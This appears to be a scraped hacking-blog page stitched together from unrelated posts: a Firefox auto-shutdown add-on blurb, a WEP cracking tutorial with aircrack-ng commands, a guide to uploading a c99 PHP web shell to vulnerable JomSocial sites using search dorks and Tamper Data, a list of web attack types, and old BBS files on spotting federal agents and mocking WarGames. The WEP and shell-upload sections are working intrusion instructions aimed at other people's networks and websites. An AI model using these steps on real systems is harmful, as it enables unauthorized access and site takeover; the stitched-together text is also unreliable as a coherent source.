How to Shutdown Computer automatically Using Firefox Auto Shutdown Add-on

4222061665 632c48d187 o How to Shutdown Computer automatically Using Firefox Auto Shutdown Add onFirefox is the top most world widely used web browser. Because it is handy and have lots of features though its add-on and extension. Sometimes we download files using Firefox and on the same time we need to go for some work. So until we come back the computer waste the energy. In this situation we can use Firefox Auto shutdown the computer when downloads are completed and helps us to save electric power.

4222067729 241056e744 How to Shutdown Computer automatically Using Firefox Auto Shutdown Add on

Auto Shutdown is a cool Firefox add-on which controls your active download and shut down the computer when downloads are completed through is auto executing user script. Not only this but if Firefox is running idle it also shut downs the pc 4222074655 e22c0502ae o How to Shutdown Computer automatically Using Firefox Auto Shutdown Add onautomatically with pre defined shut down time.

If you are using Downthemall Firefox extension for downloading movies, video, music and images from web then you can easily integrate Auto shutdown Firefox extension with downthemall add-on.

Download Auto shutdown Firefox Add-on

Simple Wi-Fi WEP Crack

wifi-300x189

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run:tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done! icon smile Simple Wi Fi WEP Crack [TUTORIAL]

How to hack JomSocial CMS based websites

JomSocial ~ Joomla Shell Upload Vulnerability

You need:
A Shell
Tamper Data
Vulnerable Site
& a Brain

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. “myshell”)
3. Copy the shell to the same folder and rename it to “yourshell.php.flv”
4. Now in your folder you have 2 files, “myshell.php” & “myshell.php.flv”.

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.

The reason for having created a file called “myshell.php.flv”, is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your “myshell.php.flv”.
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for “myshell.php.flv” then delete the .flv part meaning you will have “myshell.php” left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your “random.php”

How to find a Vulnerable Website?

How to find a Vulnerable Website?

Common Methods used for Website Hacking
There are lots of methods that can be used to hack a website but most common ones are as follows:

1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack

Tools:

Acunetix:
Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Nessus:
Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file security checks a client/server architecture with a GTK graphical interface etc.

Retina:
Retina is another Vulnerability Assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Metasploit Framework:
The Metasploit Framework is the open source penetration testing framework with the world’s largest database of public and tested exploits.

Watching the Watcher Watching You by Sir Knight

===================================
Watching the Watcher Watching You
===================================
Uploaded to OSUNY BBS by Sir Knight
===================================

[LESSON 1]
THE TRAP
=-=-=-=-=-=
LOOKING FOR A FEDERAL AGENT IS BIG NEWS. OBVIOUSLY, THESE PEOPLE ARE
SLIPPERY AND WILL DISAPPEAR IF BEING NOTICED. A PERFECT EXAMPLE IS RICHARD
SANDZA OF NEWSWEEK FAME WHO GOT SNIFFED OUT BY THE MEMBERS OF A BBS CALLED P80
AND THEN SAT DOWN TO COMPOSE HIS STUNNING INSIGHT INTO THE WORLD OF HACKERS,
“NIGHT OF THE HACKERS”.

ANOTHER WOULD BE CABLE PAIR, WHO IN 1983 CAUSED THE NUMEROUS BUSTS THAT OCCURED
BETWEEN THE SUMMER AND WINTER OF THAT YEAR. BUT HOW DO YOU KNOW WHAT TO LOOK
OUT FOR? WHAT IF YOU SUSPECT SOMEONE BUT ARE NOT SURE…YOU DONT ACCUSE THEM,
JUST REFER BACK TO THESE HANDY LITTLE HINTS….

THIS FILE IS FOR INFORMATIONAL PURPOSES ONLY, AND THE SYSOP IS NOT RESPONSIBLE
FOR WHAT I HAVE ENTERED.

[LESSON 2]
TIPS
=-=-=-=-=-=
HAVE YOU EVER SEEN THIS ON YOUR FAVE RAVE PHREAK BOARD:

“LEAVE ME A PHONE NUMBER AND I WILL GET IN TOUCH WITH YOU..WE CAN TRADE
SOMECODEZ…”

THIS PERSON IS OBVIOUSLY BLOTTED OUT OF HIS GOURD, OR HE IS TRYING TO GET SOME
INFO ON YOU! FEDS WANT TO KNOW PEOPLE AND KNOW AS MUCH ABOUT THEM AS THEY CAN
WITHOUT GETTING FOUND OUT. SO, DONT MESS WITH THESE KINDS OF PEOPLE.

HOW ABOUT THIS COMMON ONE:

“CAN I HAVE A TRW ACCOUNT FOR A SYSTEM? I AM REAL INTERESTED…”

LISTEN. DURING THIS TERRIBLE YULETIDE OF TERROR REIGNING FROM MONTANA BUTTHAC
K’S ARTICLE, YOU DONT TRUST ANYONE WITH YOUR PERSONALLY GOTTEN/HACKED OUT
ACCOUNT UNLESS YOU KNOW THEM. AND, ABOVE ALL, DONT POST THEM ON PUBLIC SYSTEMS
WHERE EVERY FED IN 30 STATES CAN GET THEM AND CHECK THEM OUT. IF ENOUGH PEOPLE
HAVE YOUR OWN PERSONAL ACCOUNTS, THEN THE DAMN THINGS ARE LIKELY TO BE TURNED
OFF FROM TOO MANY PEOPLE HAVING A CREDIT CHECK BY THE LENOXX BANK OF MASS.

EVER HEAR–

“GOT ANY NEW VISA’S OR MASTERCARDS?”

WHAT WAS SAID ABOUT PW’S GOES DOUBLE FOR CREDIT CARDS. I WOULD BE DOUBLY
CAREFUL ABOUT THE OBTAINING AND/OR USE OF THEM. I DONT DO THAT STUFF AND NEVER
WILL BECAUSE I DONT WANT TO GIVE THE FEDS THE CHANCE TO SAY,”HEY, THIS KID’S
JUST DROPPING HIS PANTS AND BENDING HIM OVER. LET’S GIVE HIM THE STICK.”

WHAT ABOUT…

“CAN SOMEONE TELL ME HOW TO PHREAK”

OR

“CAN SOMEONE TEACH ME HOW TO HACK

DONT BE TOO TRUSTING ANY MORE ABOUT NEW PHREAKS/HACKS UNLESS THEY LOOK LIKE
INNOCENT KIDS. YOU ALL SHOULD KNOW HOW TO TELL IF THERE IS SOME KID THAT COMES
FROM A GOOD JEWISH, UPPER-MIDDLE CLASS FAMILY THAT WANTS TO KNOW THE HOW-TO
STUFF AND THAT IS OKAY. BUT ALWAYS ASK THREE QUESTIONS OF YOUR APPRENTICES:

1]WHAT IS YOUR NAME
2]WHAT IS YOUR PHONE NUMBER
3]HOW OLD ARE YOU

NUMBER THREE IS CRUCIAL..IF THEY ARE OVER 19 YEARS OF AGE, DONT WASTE YOUR TIME
OR EFFORT. YOU DONT KNOW THEM AND YOU WANT NOTHING TO DO WITH THEM. IF THEY
DO LIE ABOUT THEIR AGE(YOU CAN TELL IF YOU TALK TO THEM VOICE DUM DUM) AND THEY
ARE UNDER 19, THEN YOU CAN TELL THEM OKAY. JUST STAY COOL ABOUT IT.

WELL, THAT IS ALL THAT I CAN THINK OF NOW. IF ANYONE HAS ANY ADDITIONS, YOU CA
N COMPOSE A FILE USING THE P COMMAND.

I WOULD LIKE TO THANK OSUNY BBS FOR ITS CONTINUED EFFORT TO PROVIDE SERVICE TO
THE PHREAK/HACK COMMUNITY AND TO MY FINGERS WITHOUT WHOSE TIRELESS EFFORT I
WOULD NOT HAVE BEEN ABLE TO COMPOSE THIS FILE.

SIR KNIGHT

(*)-THE *ELITE* PHREAKERS CLUB-(*)


Is Wargames Possible? BULLSHIT! An Overview by The Jabberwock

{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}

Is WARGAMES Possible?
BULLSHIT!

AN OVERVIEW BY

THE JABBERWOCK

{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}

I know that all of you phreaks and hacks out there have seen the
“masterpeice” of a movie (HA) “WarGames.” Whell, I don’t know what you
people think, but as for me and the majority of the people I know, we say,
“That thing sucks!!”
You cannot expect anyone to be perfect, of course, but you can expect
someone to be a little more realistic than the producers, directors,
writers, and sanitation engineers who all put forth their various talents in
the making of this peice. (Of what, is left up to your own imaginations.)
To begin with the major clincher that pretty much destroys the whole
format of the entire picture, that ol’ “SCANNING WITH THE ACOUSTIC MODEM.”
Ahh, I do it all the time, don’t you? Why couldn’t they have just let Dave
have a direct connect, and have ol’ Jennifer say, “what is that box?” Dave
would have replied, from his ever resourceful mind, from which such quotes
as “Only if you’re over 18,” and the ever popular, “Turn on the PRINTer, I
want to make a PRINT-out of this,” (redundancy at its best, pholks), “That
is my MOdulator-DEModulator, it allows me to talk to other computers over
the telephone lines.”
“Ahh, there’s ways around that!” What an asshole. He looks like
he wrote the software used by the SCC’s. Genius material. Just how in the
phuck does he accomplish this. This is just a minor quam of mine.
How about the idea that he can just waltz right into Protovision
and rip-off the shit that would see to it that “the world of computer games
will never be the same.” WOW!! Where can I get a PRINT-out of that ad?
How about that school computer? I sure do like that password, and
the place that they keep it, (mine is in the back of the Main Office in the
Data Processing Dept. in a locked drawer, under three comp. language books in
a manilla folder marked, “Regional-Files Circuit 8.)” And that Seattle School
District computer is the most advanced peice of technology I have ever seen.
All you have to do, the minute you are in, is type in a name, and then just
move that little cursor on over. Neat.
Another little ditty, “what baud was Dave’s modem at?” That muther
spewed out at about 2000, or something about to that effect. And his printer
was keeping up, or was it? (I wonder if he got a PRINT-out of “that”?)
Once on old WOPR (Brgr) I won’t question the fact that he got
on it through a direct line, although it was supposed to be rerouted through
Sunnyvale at some Naval thing (I thought WOPR (Brgr) was an Air Force comp)
but I would like to know how in the hell he got through to such a dastardly
machine without having to cut into AUTOVON or FTS. I will quote from
NEWSWEEK/September 5, 1983 about such a deed:
“The computer systems of the North American Air Defense Command
(NORAD) are totally isolated from the commercial telephone lines to which
hackers have access, and the data they handle go through a complex coding
process. (They have the new data encryption algorythims, you’ll never get
in.)… ‘Hackers don’t pose a significant problem,’ says Donald Latham,
deputy under security of defense for command-control communications and
intelligence (C3I). ‘The problem of being penetrated is essentially zero.'”
Poor guy, no penetration. Another thing how about those Hi-Res
pictures that WOPR (Brgr) sends over to Dave? Pretty, huh? And that
timer that keeps on ticking after Dave hangs up the phone? (Maybe its a
Timex.)
I like the feds acting so inconspicuous at the 7-11. I know that
whenever some dude I know gets busted, it is out in public by dudes in the
typical black suit and tie on a 100-degree day with huge hearing aids,
and noone even notices them. God, they are masters of disguise!
Telephone trick. Not even. Unless the coke tab acted as a 2.2k
resistor, which I seriously doubt. Even then he would have had to go through
the operator.
I also like how S.A.M. has its part in our National Defense System.
And how about the fact that it only spoke the incoming data, and not what
Dave typed. And of the incoming data, it only spoke the major lines, that
the directors wanted to improvise. I can see it if Dave had loaded the sayit
program into his terminal program, but as far as we know, he never had one!!
His modem dialed fast, didn’t it? By any means, no call but a local
one could go through that fast, and the computer would need to wait a little
longer to find a carrier. Does yours hang up when someone answers the phone?
Mine waits for around 20 for even locals, and that gives the phools getting
my calls time to go a little crazy screaming “Who is this? What do you want
with me? Where did you get this phone number? I’m going to call the
police!”
Another thing, (this is my favorite, besides the PRINT-out shit).
Don’t you like the way Dabney Coleman answers the phone? After letting it
ring off the cradle, he answers it “Hello?” Then he picks it up!
Slightly HUMOROUS, don’t you think? A backasswards kind of a guy, that
Mikkitrick.
I think now that I have said quite enough to prove my point,
“WarGames is a completely sorry movie, and is utterly impossible.”
Thank you for your time. I thank you, David Lightman thanks you,
John Mikkitrick thanks you, General (I’d piss on a spark-plug) Berringer
thanks you, WOPR (Brgr) thanks you, Perfesser Stephen F. Falken thanks you,
Donald Latham thanks you, Norman Bates thanks you, Eddy thanks you,
Marilyn Chambers thanks everyone, the Official Hacking Team of the 1984
Olympics thanks you, Tron Yuri and Flynn thank you, time wasters and space
occupiers everywhere thank you, James Bond thanks you eight times, Sir
Alfred Hitchcock thanks you, Key Grips, Gaffers, Headbangers, Stoners,
Geeks, Retards & Mr. Mom thanks you, Sheriff Buford T. (I’m gonna barbecue
your ass) Justice thanks you, Norm and the boys from Cheers thank you,
RALF and the Whizz Kids thank you, Ozzy (I’d piss on a public landmark)
Osborne thanks you, the members of the old, good Saturday Night Live
thank you, Porky (Mr. Porky to you) thanks you, Brad, Janet, and Dr.
Frankenfurter thank you, Foreign Special Intercept Operators from
across the U.S. say “gracias”, Suzie at the Sex Connection moans her thanks,
Hugh Hefner doesen’t have to thank anyone, Mr. (Come on over here and I’m
gonna f**k you up the as*) T thanks you, Peter Tosh thanks you, Nolan
Bushnell thanks you along with regards from Steve Wozniac, Charles Manson
wants to thank you personally, Fidel Castro thanks you, Clint Eastwood
thanks you for “making his day”, Richard Stallman wants to know why you
insist on using other people’s guest accounts on OZ, Henry Fonda thanks
you long distance, Eddie Murphy thanks you, Richard Pryor says “F**k,
thank you? I’d rather have some pu**y, Zodiac thanks you for remembering,
Abbie Hoffman says thanks for the memories, James Hoffa says “Where the
lell are you people?”, AT & T says thanks for f**king your local SCC,
your local Bell Telco says “What are all those trouble cards doing on
your line?”, John Wayne says “thanks, pardner”, Jeff Spicoli says,
“Wow, bitchen”, Captain Over, Unger and Dunn thank you, the Sta-Puff
Marshmellow Man thanks the Gatekeeper, the Key master, and Gozer,
Novation says “you don’t think we put those tones in there by accident,
do you?”, Gary Gygax thanks you, Sir Arthur Conan Doyle thanks you,
Grace (you mean that’s a woman?) Jones thanks you, Arnold
(Gonad the Ballbarian) Schwartzeneger thanks you, the Warriors thank you,
MCI, Satelco, LDS, LDX, Sprint, Metrophone, ITT, Tel-tec, All-net, Travel-net,
and various owners of Wats Extenders say “go to hell!”, the Smothers Brothers
say “hi Mom!”, Donkey Kong, Mr. Do, the Pac Family, Dirk the Daring &
Princess Daphne, Dexter and Kimberly, C P U, Glass Jaw, Piston Hurricane,
Bald Bull, Kid Quick (that’s all I know), and Q-Bert all express their thanks,
Auto-Man and Cursor thank you, and I thank you yet another time for putting
up with all of this bullshit.

editorial complete

The Jabberwock

{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}